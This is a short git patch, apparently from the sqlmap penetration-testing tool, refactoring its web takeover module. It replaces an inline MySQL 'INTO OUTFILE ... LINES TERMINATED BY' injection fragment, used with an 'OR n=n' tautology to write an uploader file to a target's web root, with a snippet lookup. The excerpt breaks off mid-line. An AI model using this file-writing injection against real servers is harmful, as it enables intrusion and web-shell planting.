From cbe8f417460aa8e2952c31945535cc141be8e7f6 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Fri, 20 Jul 2012 16:20:17 +0100 Subject: [PATCH] minor code refactoring preparing for #96 --- lib/takeover/web.py | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 55f69db96..6c7c7ffa1 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -18,6 +18,7 @@ from lib.core.common import decloakToNamedTemporaryFile from lib.core.common import extractRegexResult from lib.core.common import getDirs from lib.core.common import getDocRoot +from lib.core.common import getSQLSnippet from lib.core.common import ntToPosixSlashes from lib.core.common import isTechniqueAvailable from lib.core.common import isWindowsDriveLetterPath @@ -32,6 +33,7 @@ from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths +from lib.core.enums import DBMS from lib.core.enums import OS from lib.core.enums import PAYLOAD from lib.request.connect import Connect as Request @@ -115,8 +117,7 @@ class Web: randInt = randomInt() query += "OR %d=%d " % (randInt, randInt) - query += "LIMIT 1 INTO OUTFILE '%s' " % outFile - query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery) + query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery)) query = agent.prefixQuery(query) query = agent.suffixQuery(query) payload = agent.payload(newValue=query) @@ -247,8 +248,8 @@ class Web: continue elif "<%" in uplPage or "